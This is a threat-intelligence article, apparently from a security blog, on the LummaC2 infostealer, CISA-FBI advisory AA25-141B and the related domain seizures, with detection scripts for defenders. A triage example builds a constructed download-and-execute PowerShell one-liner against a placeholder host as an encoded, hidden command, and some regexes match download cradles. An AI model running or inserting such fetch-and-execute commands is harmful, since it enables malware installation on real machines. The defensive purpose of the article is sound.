LummaC2 Infostealer Targets US Critical Infrastructure: CISA-FBI Advisory AA25-141B and DOJ Domain Seizures

The FBI and CISA (Cybersecurity and Infrastructure Security Agency) jointly published advisory AA25-141B detailing the tactics, techniques, and procedures (TTPs — the methods adversaries use to gain access, move through networks, and steal data) of LummaC2, a prolific Malware-as-a-Service (MaaS — a criminal business model where malware is rented to other attackers for a fee) infostealer that has been confirmed targeting US critical infrastructure organizations across multiple sectors. Concurrent with the advisory, the US Department of Justice seized five core LummaC2 domains and more than 2,300 related websites in coordination with Microsoft and Europol — disrupting but not eliminating LummaC2 operations.

LummaC2 Infostealer: Technical Details

LummaC2 (also referred to as Lumma Stealer) is an information-stealing malware first observed in late 2022, initially advertised on underground forums by a threat actor known as "Shamel" operating under the handle "Shamel_Bits." From its first appearance, LummaC2 was designed as a commercial MaaS platform: subscribers pay a recurring fee to receive access to the malware builder, C2 (command-and-control) infrastructure, and a web panel to manage stolen credential logs.

MITRE ATT&CK (software entry S1213) documents LummaC2's technical capabilities in detail. Key TTPs from CISA advisory AA25-141B:

Initial access — T1566 (Phishing) and T1204 (User Execution): LummaC2 is delivered primarily through two mechanisms. The first is spearphishing emails with malicious hyperlinks or attachments. The second, and increasingly dominant, delivery method is fake CAPTCHA lures — attackers direct users to a webpage displaying a convincing CAPTCHA verification dialog. The dialog instructs users to open the Windows Run window (Win + R) and paste clipboard contents, triggering a Base64-encoded PowerShell (a Windows scripting language commonly used by both administrators and attackers) process that downloads and executes the LummaC2 payload. This technique is a variant of the ClickFix social engineering approach.

LummaC2 is also distributed embedded within spoofed versions of legitimate software: media players, system utilities, PDF readers, and developer tools distributed via malicious download sites, SEO-poisoned search results, and compromised software repositories.

Defense evasion — T1027, T1055, T1562: The malware employs multiple layers of defense evasion:

  • Fileless execution — payload runs in memory without writing a binary to disk, evading file-based antivirus scanning
  • Dynamic API resolution and direct system calls — instead of importing Windows API functions at load time (where security tools can inspect the import table), LummaC2 resolves function addresses at runtime and issues system calls directly, bypassing the user-mode API layer that most EDR (Endpoint Detection and Response) platforms hook to monitor behaviour
  • String and configuration obfuscation — all embedded strings, including C2 server addresses, are encrypted and decrypted at runtime
  • Anti-sandbox and anti-VM techniques — the malware checks for virtual machine artifacts (registry keys, process names, hardware identifiers common in analysis sandboxes), delays execution, and requires evidence of human interaction before triggering its payload

Credential and data access — T1555, T1539, T1528: Once active, LummaC2 silently exfiltrates a wide range of data:

  • Browser-saved passwords and autofill data from Chrome, Firefox, Edge, Brave, Opera, and other Chromium-based browsers
  • Browser session cookies — which allow attackers to hijack authenticated sessions without knowing passwords
  • PII (Personally Identifiable Information — name, address, date of birth, national ID numbers) from documents and browser form data
  • Financial credentials — banking site logins, payment card data stored in browsers
  • Browser extensions, including cryptocurrency wallet extensions (MetaMask, Phantom, Keplr, etc.)
  • Cryptocurrency wallet seed phrases and private keys from installed wallet software
  • MFA (Multi-Factor Authentication — a login protection mechanism using a second verification step such as a one-time code) codes and TOTP (Time-based One-Time Password) secrets from authenticator apps where accessible

C2 infrastructure — T1071, T1090: LummaC2 employs a multi-tiered C2 architecture designed for resilience. Each malware build contains nine hard-coded tier-1 C2 domain addresses that rotate frequently. If all tier-1 domains are unreachable — for example, following domain seizures — the malware falls back to C2 addresses embedded in Steam community profiles and Telegram channels controlled by the operators, making full infrastructure takedown significantly harder than targeting a fixed set of domains.
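The fallback design above gives defenders a hunting angle: a query to a Steam or Telegram host from anything other than a browser or the Steam/Telegram client is worth a look. The following is an added example, not code from the advisory or from this article; it assumes Sysmon Event ID 22 (DNS query) records flattened into constructed `key=value` lines with `Image` and `QueryName` fields, and uses a labelled placeholder in place of the advisory's actual tier-1 C2 domains.

```python
import re

# Dead-drop hosts LummaC2 falls back to when tier-1 C2 domains are down
# (Steam community profiles, Telegram channels). Browsers and the Steam/Telegram
# clients query these legitimately; the signal is a query from any other process.
DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me", "telegram.org", "telegram.me"}
ALLOWED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe",
                  "steam.exe", "steamwebhelper.exe", "telegram.exe"}
# PLACEHOLDER: load the current tier-1 C2 domains from the advisory's IoC list.
KNOWN_C2 = {"tier1-c2-placeholder.invalid"}

FIELD = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")  # key=value pairs; values may contain spaces

def parse_dns_line(line):
    # Constructed Sysmon Event ID 22 style record; real exports carry more fields.
    return dict(FIELD.findall(line))

def registrable(host):
    # Collapse "profile.steamcommunity.com" style names to their registrable domain.
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])

def hunt(lines):
    hits = []
    for line in lines:
        rec = parse_dns_line(line)
        host = rec.get("QueryName", "").lower()
        image = rec.get("Image", "")
        exe = image.rsplit("\\", 1)[-1].lower()
        if host in KNOWN_C2 or registrable(host) in KNOWN_C2:
            hits.append((image, host, "known tier-1 C2 domain"))
        elif registrable(host) in DEAD_DROP_HOSTS and exe not in ALLOWED_IMAGES:
            hits.append((image, host, "dead-drop host queried by non-browser process"))
    return hits

# Constructed sample lines (not telemetry from the advisory).
SAMPLE_LINES = [
    r"EventID=22 Image=C:\Program Files\Google\Chrome\Application\chrome.exe QueryName=steamcommunity.com",
    r"EventID=22 Image=C:\Users\u\AppData\Local\Temp\svc_upd.exe QueryName=steamcommunity.com",
    r"EventID=22 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe QueryName=tier1-c2-placeholder.invalid",
    r"EventID=22 Image=C:\Program Files (x86)\Steam\steam.exe QueryName=steamcommunity.com",
]
```

Tune `ALLOWED_IMAGES` to the software actually deployed in your estate; an unexpected binary in a user's Temp directory reaching steamcommunity.com is the case this is built to surface.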

Exploitation Status and Threat Landscape

The scale of LummaC2 operations is documented in the advisory: between April and June 2024 alone, private-sector sources identified over 21,000 listings for LummaC2 credential logs across underground marketplaces — a 71.7% year-over-year increase. Each "log" represents the complete credential harvest from one compromised machine.

The FBI and Europol, coordinating with Microsoft's Digital Crimes Unit, disrupted the LummaC2 network in May 2025 by seizing five core control panel domains and approximately 2,300 affiliated distribution and C2 sites. Within 24 hours, LummaC2 operators announced three replacement domains to their subscriber base — and the DOJ seized those as well the following day. The rapid domain replacement demonstrates LummaC2 operators' resilience planning and the limitations of infrastructure takedown as a definitive mitigation.

Industrial Cyber reported that active LummaC2 campaigns continued targeting US critical infrastructure organizations even during the disruption window. The advisory confirms IOC activity from November 2023 through at least the advisory publication date.

Who Is Affected

CISA's advisory specifically calls out US critical infrastructure sectors as confirmed targets, including healthcare, financial services, manufacturing, energy, and government. The MaaS model means LummaC2 is operated by dozens of independent criminal affiliates simultaneously — meaning targeting is not centrally coordinated. Any organization whose employees have corporate credentials stored in browsers, use web-based SaaS applications, or access sensitive systems from managed or unmanaged devices is a viable target.

Individuals exposed to the campaign most commonly encounter it via:

  • Malicious sponsored search results for cracked or free versions of commercial software
  • Email phishing campaigns distributing fake invoices, shipping notifications, or HR documents
  • Fake software download sites returned by SEO-poisoned search results
  • Compromised legitimate websites that serve the fake CAPTCHA lure to visitors

What You Should Do Right Now

  • Deploy endpoint detection for clipboard-based execution patterns. LummaC2's fake-CAPTCHA delivery relies on users pasting PowerShell commands from the clipboard. Detection rule: alert on cmd.exe or powershell.exe processes spawned as children of the Run dialog (hosted by explorer.exe) or Explorer whose command line carries a Base64-encoded payload:

# PowerShell detection: alert on encoded PowerShell in process-creation events.
# Requires "Audit Process Creation" plus "Include command line in process
# creation events" so that Event ID 4688 records the full command line.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object {
    $_.Message -match '(?i)\\(powershell|pwsh|cmd)\.exe' -and
    $_.Message -match '(?i)\s-e(c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}|FromBase64String'
}
  • Enable browser credential protection. Enforce policies that prevent browsers from storing passwords for sensitive applications (VPN portals, email, cloud consoles, financial systems). Use a dedicated password manager rather than browser-native credential storage. LummaC2 specifically targets browser credential databases.
  • Block known LummaC2 distribution channels at the proxy/DNS level. Implement DNS filtering (e.g., via Cisco Umbrella, Cloudflare Gateway, or Pi-hole for on-premise) to block domains serving fake software installers. Subscribe to threat intelligence feeds for current LummaC2 IOCs — the CISA advisory and the IC3 bulletin include indicators.
  • Audit browser extension installations across your organization. LummaC2 specifically targets browser-based cryptocurrency wallet extensions. Review and enforce an allowlist of approved browser extensions via Group Policy or MDM (Mobile Device Management) to prevent unauthorized wallet extensions from being present in corporate browsers.
  • Implement short-lived session tokens and MFA for all privileged access. Since LummaC2 steals session cookies to bypass password authentication, ensure privileged sessions (cloud consoles, VPN, email admin) enforce re-authentication at short intervals and cannot be replayed by an attacker who steals a session token.
  • Hunt for indicators in your environment. Review MITRE ATT&CK S1213 for the complete technique listing and use it to build detection coverage. Check DNS logs for connections to known tier-1 C2 domains and Steam community profiles with suspicious update patterns.
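The fake-CAPTCHA delivery chain described earlier and the first action item above both come down to the same telemetry: a shell launched from Explorer with an encoded command line. The following is an added example, not code from the advisory or from this article; it triages constructed Event ID 4688-style records (parent, image, command line), decodes the `-EncodedCommand` blob the way PowerShell does (Base64 of UTF-16LE text), and grades the result by whether the decoded payload contains a download-and-execute cradle and whether the parent is explorer.exe. The sample pasted one-liner and its host are constructed.

```python
import base64
import re

# Encoded-command switch (-e, -ec, -enc, -EncodedCommand) followed by a Base64 blob.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Download-and-execute cradle keywords a pasted ClickFix one-liner typically needs.
CRADLE = re.compile(r"(?i)invoke-webrequest|\biwr\b|\biex\b|invoke-expression|"
                    r"downloadstring|downloadfile|net\.webclient")
# The Run dialog is hosted by explorer.exe, so pasted commands appear as its children.
INTERACTIVE_PARENT = "explorer.exe"
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

def decode_encoded_command(cmdline):
    # Return the decoded -EncodedCommand payload (UTF-16LE text) or None.
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a blob PowerShell itself would accept

def triage_event(ev):
    # Return a finding for one process-creation record, or None if benign.
    if not ev["image"].lower().endswith(SHELLS):
        return None
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is None:
        return None  # plain command lines are normal admin activity
    reasons = ["encoded command line"]
    if CRADLE.search(decoded):
        reasons.append("download/execute cradle in decoded payload")
    if ev["parent"].lower().endswith(INTERACTIVE_PARENT):
        reasons.append("spawned from Explorer/Run dialog")
    return {"cmdline": ev["cmdline"], "decoded": decoded, "reasons": reasons,
            "severity": "high" if len(reasons) == 3 else "medium"}

def triage(events):
    return [f for f in map(triage_event, events) if f]

# Constructed sample records in Event ID 4688 terms (not telemetry from the advisory).
_PASTED = "iwr http://example.invalid/p | iex"  # constructed ClickFix-style one-liner
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc "
                + base64.b64encode(_PASTED.encode("utf-16-le")).decode("ascii")},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\nightly.ps1"},
]
```

Note that the `-ep bypass` switch in the first sample is correctly ignored by `ENC_SWITCH`; only the true encoded-command switch followed by a Base64 blob is decoded.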

Background: Understanding the Risk

LummaC2's rise illustrates the maturation of the credential theft economy. In 2022, sophisticated credential-stealing operations required either custom malware development or access to private crimeware networks. By 2024, LummaC2 had commoditized this capability: for a subscription fee equivalent to a few hundred dollars per month, any criminal actor could deploy a professional infostealer with evasion capabilities that rival nation-state tools, complete with a web panel showing harvested logs in real time.

The critical infrastructure targeting noted in the CISA advisory reflects a downstream consequence of this commoditization. Organizations in critical sectors do not become targets through deliberate selection by LummaC2 operators — they become victims because their employees, contractors, or vendors use devices and browsers where LummaC2-harvested credentials enable access to systems that happen to be critical. A contractor's personal laptop infected with LummaC2 that stores credentials to a water utility's VPN represents the same risk as a direct attack on that utility.

The multi-tiered C2 infrastructure — tier-1 domains, Steam profiles, Telegram channels — represents a deliberate design choice by LummaC2 operators to survive takedown attempts. The DOJ seizure in 2025 was the most significant disruption action to date and demonstrates that law enforcement can impose meaningful operational costs on MaaS operators. But the 24-hour domain replacement response time illustrates that infrastructure takedown alone cannot neutralize a well-resourced criminal operation. Defender-side mitigations — credential hygiene, browser protection, endpoint detection — remain the primary reliable defense.

Conclusion

LummaC2 remains an active, resilient threat despite the 2025 DOJ disruption action. Organizations in critical sectors should treat the CISA-FBI advisory as a direct call to audit browser credential exposure, deploy detection for clipboard-execution attacks, and implement session controls that reduce the value of stolen authentication tokens. The single highest-impact action is eliminating browser-stored credentials for access to sensitive systems — removing the primary commodity LummaC2 is engineered to harvest.

For any query contact us at contact@cipherssecurity.com
